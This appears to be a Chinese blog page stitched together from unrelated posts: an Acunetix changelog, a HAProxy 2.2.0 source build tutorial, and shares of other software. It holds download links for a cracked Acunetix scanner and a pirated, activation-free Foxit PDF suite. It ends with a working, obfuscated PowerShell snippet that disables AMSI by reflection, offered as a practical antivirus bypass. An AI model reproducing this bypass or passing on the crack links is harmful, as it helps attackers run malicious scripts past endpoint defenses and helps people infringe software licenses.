• 修复了导致自定义用户代理在扫描过程中未在所有请求中使用的问题
• 修复了导致某些漏洞在发送到JIRA问题跟踪器时无法正确格式化的问题
• 解决了在Acunetix Online中添加JIRA问题跟踪器时的问题
• 解决了将目标添加到现有目标组时导致的问题
• 综合报告文本中的次要修复
• 修复了使用浏览器的后退按钮时显示空白列表（扫描，目标等）的UI问题
• 解决了扫描具有复杂GraphQL模式的目标所导致的问题

-------------------------------------------------------------------------------------------------

update：2020/10/10

acunetix_13.0.201006145.exe 下载：https://cloud.189.cn/t/raYjIjeQ32yq（访问码：2do6）

acunetix_13.0.201006145_x64.sh 破解补丁包： https://cloud.189.cn/t/mUV3UnqIrU3u（访问码：ei4v）

https://mega.nz/folder/eU9WEIwJ#XZ2lIjy5P8dJSAhyXR_AmA

WeChatDownload v20200520下载——微信公众号文章和评论的批量/单独下载保存为PDF工具

此为目前最新版本v20200520，原作者的收费QQ群目前需要12元的入场费，已经有2740人付费进，初略计算也有3W+收入，我再次分享别无它意，作者说是免费使用，但是进群下载是个门槛，对此我不做任何评论，只是分享下，主要是有朋友问我GitHub的项目一些公众号文章是怎么保存的，借此分享下这个软件，同时一并打包下PDF的编辑查看工具：Foxit PhantomPDF Business v6.0.6.715.msi，这个是福昕风腾PDF套件金山版(标准版)v6.0.6.715官方零售版免激活永久授权版，不需要激活安装即可使用，推荐使用。下面简单介绍下WeChatDownload v20200520的使用和下载连接：

使用截图：

 

可以根据自己的需要设置，比如下载保存为PDF，是否下载评论等等。

 

PDF软件下载的连接：

https://cloud.189.cn/t/rUBRfu6FRBr2 (访问码:fy9u) 

WeChatDownload v20200520下载：

https://cloud.189.cn/t/MzyEZ3M7nUBf (访问码:1ptd)

haproxy是一个由C语言编写主要应用于高可用性和负载均衡的应用层代理软件。

 

今天需要用到haproxy，但是无奈通过系统 Debian10 自带的软件源安装的版本太低了 apt install -y haproxy ；故自行前往官网：http://www.haproxy.org/ 

查看最新版的haproxy，目前最新版本是 2.2.0 .

那么使用 wget 先下载到本地：wget http://www.haproxy.org/download/2.2/src/haproxy-2.2.0.tar.gz

解压：

tar zxf haproxy-2.2.0.tar.gz

进入解压后的目录：

cd haproxy-2.2.0/

执行 make 准备进行编译，但是出错：

Due to too many reports of suboptimized setups, building without
specifying the target is no longer supported. Please specify the
target OS in the TARGET variable, in the following form:

   make TARGET=xxx

Please choose the target among the following supported list :

   linux-glibc, linux-glibc-legacy, linux-musl, solaris, freebsd, openbsd,
   netbsd, cygwin, haiku, aix51, aix52, aix72-gcc, osx, generic, custom

Use "generic" if you don't want any optimization, "custom" if you
want to precisely tweak every option, or choose the target which
matches your OS the most in order to gain the maximum performance
out of it. Please check the Makefile in case of doubts.

Makefile:761: recipe for target 'all' failed
make: *** [all] Error 1

根据提示，需要设置编译的 target 。

我们可以修改目录下的 Makefile 里面的 TARGET 或者是在 make 命令后加上：make TARGET=linux-glibc 即可:

[[email protected] haproxy-2.2.0]# make TARGET=linux-glibc
  CC      src/ev_poll.o
  CC      src/ev_epoll.o
  CC      src/namespace.o
  CC      src/mux_fcgi.o
  CC      src/mux_h1.o
  CC      src/mux_h2.o
  CC      src/backend.o
  CC      src/cfgparse.o
  CC      src/cli.o
  CC      src/cfgparse-listen.o
  CC      src/stats.o
  CC      src/http_ana.o
  CC      src/stream.o
  CC      src/check.o
  CC      src/sample.o
  CC      src/tools.o
  CC      src/server.o
  CC      src/listener.o
  CC      src/tcpcheck.o
  CC      src/pattern.o
  CC      src/log.o
  CC      src/stick_table.o
  CC      src/flt_spoe.o
  CC      src/stream_interface.o
  CC      src/filters.o
  CC      src/http_fetch.o
  CC      src/map.o
  CC      src/session.o
  CC      src/sink.o
  CC      src/flt_http_comp.o
  CC      src/debug.o
  CC      src/tcp_rules.o
  CC      src/haproxy.o
  CC      src/peers.o
  CC      src/flt_trace.o
  CC      src/queue.o
  CC      src/proxy.o
  CC      src/http_htx.o
  CC      src/dns.o
  CC      src/raw_sock.o
  CC      src/pool.o
  CC      src/http_act.o
  CC      src/http_rules.o
  CC      src/compression.o
  CC      src/cfgparse-global.o
  CC      src/payload.o
  CC      src/signal.o
  CC      src/activity.o
  CC      src/mworker.o
  CC      src/cache.o
  CC      src/proto_uxst.o
  CC      src/lb_chash.o
  CC      src/connection.o
  CC      src/proto_tcp.o
  CC      src/http_conv.o
  CC      src/arg.o
  CC      src/lb_fas.o
  CC      src/xprt_handshake.o
  CC      src/fcgi-app.o
  CC      src/applet.o
  CC      src/acl.o
  CC      src/task.o
  CC      src/ring.o
  CC      src/vars.o
  CC      src/trace.o
  CC      src/mux_pt.o
  CC      src/xxhash.o
  CC      src/mworker-prog.o
  CC      src/h1_htx.o
  CC      src/frontend.o
  CC      src/extcheck.o
  CC      src/channel.o
  CC      src/action.o
  CC      src/mailers.o
  CC      src/proto_sockpair.o
  CC      src/ebmbtree.o
  CC      src/thread.o
  CC      src/lb_fwrr.o
  CC      src/time.o
  CC      src/regex.o
  CC      src/lb_fwlc.o
  CC      src/htx.o
  CC      src/h2.o
  CC      src/hpack-tbl.o
  CC      src/lru.o
  CC      src/wdt.o
  CC      src/lb_map.o
  CC      src/eb32sctree.o
  CC      src/ebistree.o
  CC      src/h1.o
  CC      src/sha1.o
  CC      src/http.o
  CC      src/fd.o
  CC      src/ev_select.o
  CC      src/chunk.o
  CC      src/hash.o
  CC      src/hpack-dec.o
  CC      src/freq_ctr.o
  CC      src/http_acl.o
  CC      src/dynbuf.o
  CC      src/uri_auth.o
  CC      src/protocol.o
  CC      src/auth.o
  CC      src/ebsttree.o
  CC      src/pipe.o
  CC      src/hpack-enc.o
  CC      src/fcgi.o
  CC      src/eb64tree.o
  CC      src/dict.o
  CC      src/shctx.o
  CC      src/ebimtree.o
  CC      src/eb32tree.o
  CC      src/ebtree.o
  CC      src/dgram.o
  CC      src/hpack-huff.o
  CC      src/base64.o
  CC      src/version.o
  LD      haproxy

注：如果失败，请注意查看机器是否安装 lua 环境，命令行执行 lua -v 如果有显示版本就是有安装，没用就自行安装，这里以本机为例：apt install -y lua5.3 

编译成功后，直接执行 make install 即可安装好 haproxy ：

[[email protected] haproxy-2.2.0]# make install
'haproxy' -> '/usr/local/sbin/haproxy'
'doc/haproxy.1' -> '/usr/local/share/man/man1/haproxy.1'
install: creating directory '/usr/local/doc'
install: creating directory '/usr/local/doc/haproxy'
'doc/configuration.txt' -> '/usr/local/doc/haproxy/configuration.txt'
'doc/management.txt' -> '/usr/local/doc/haproxy/management.txt'
'doc/proxy-protocol.txt' -> '/usr/local/doc/haproxy/proxy-protocol.txt'
'doc/seamless_reload.txt' -> '/usr/local/doc/haproxy/seamless_reload.txt'
'doc/architecture.txt' -> '/usr/local/doc/haproxy/architecture.txt'
'doc/peers-v2.0.txt' -> '/usr/local/doc/haproxy/peers-v2.0.txt'
'doc/regression-testing.txt' -> '/usr/local/doc/haproxy/regression-testing.txt'
'doc/cookie-options.txt' -> '/usr/local/doc/haproxy/cookie-options.txt'
'doc/lua.txt' -> '/usr/local/doc/haproxy/lua.txt'
'doc/WURFL-device-detection.txt' -> '/usr/local/doc/haproxy/WURFL-device-detection.txt'
'doc/linux-syn-cookies.txt' -> '/usr/local/doc/haproxy/linux-syn-cookies.txt'
'doc/SOCKS4.protocol.txt' -> '/usr/local/doc/haproxy/SOCKS4.protocol.txt'
'doc/network-namespaces.txt' -> '/usr/local/doc/haproxy/network-namespaces.txt'
'doc/DeviceAtlas-device-detection.txt' -> '/usr/local/doc/haproxy/DeviceAtlas-device-detection.txt'
'doc/51Degrees-device-detection.txt' -> '/usr/local/doc/haproxy/51Degrees-device-detection.txt'
'doc/netscaler-client-ip-insertion-protocol.txt' -> '/usr/local/doc/haproxy/netscaler-client-ip-insertion-protocol.txt'
'doc/peers.txt' -> '/usr/local/doc/haproxy/peers.txt'
'doc/close-options.txt' -> '/usr/local/doc/haproxy/close-options.txt'
'doc/SPOE.txt' -> '/usr/local/doc/haproxy/SPOE.txt'
'doc/intro.txt' -> '/usr/local/doc/haproxy/intro.txt'
[[email protected] haproxy-2.2.0]# haproxy -v
HA-Proxy version 2.2.0 2020/07/07 - https://haproxy.org/
Status: long-term supported branch - will stop receiving fixes around Q2 2025.
Known bugs: http://www.haproxy.org/bugs/bugs-2.2.0.html
Running on: Linux 4.18.0-80.7.1.el8_0.x86_64 #1 SMP Sat Aug 3 15:14:00 UTC 2019 x86_64
[[email protected] haproxy-2.2.0]#

执行 haproxy -v 可以正确显示 版本号 2.2.0 即表明安装成功。

至于其 haproxy 的配置，根据业务需要，自行配置。Google上一大把。

简单的演示下从老外哪里学来的bypass AMSI 的姿势，看下效果图: 



 

绕过AMSI执行powershell脚本

AMSI的全称是反恶意软件扫描接口（Anti-Malware Scan Interface），是从Windows 10开始引入的一种机制。AMSI是应用程序和服务能够使用的一种接口，程序和服务可以将“数据”发送到安装在系统上的反恶意软件服务（如Windows Defender）。

在基于场景的资产评估或者基于数据的红队评估中，许多渗透测试人员都会与AMSI打交道，因此对相关功能也比较了解。AMSI能够提供更强大的保护，可以为反恶意软件产品提供更透彻的可见性，因此能防御攻击过程中常用的一些现代工具、战术以及过程（TTP）。最相关的操作就是PowerShell无文件payload，在实际环境中，攻击者及渗透测试人员都在使用这种技术来完成任务。

正因为此，AMSI是大家广泛研究的一个主题，能否绕过AMSI已经成为攻击能否成功的决定性因素。在本文中，介绍了一种新的绕过方法。

关键powershell代码如下：

$a =[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') 

$h="4456625220575263174452554847" 

$s =[string](0..13|%{[char][int](53+($h).substring(($_*2),2))})-replace " " 

$b =$a.GetField($s,'NonPublic,Static') $b.SetValue($null,$true)

效果如图：

代码来自：https://pastebin.com/sQFWANwr

参考文章：https://www.anquanke.com/post/id/180281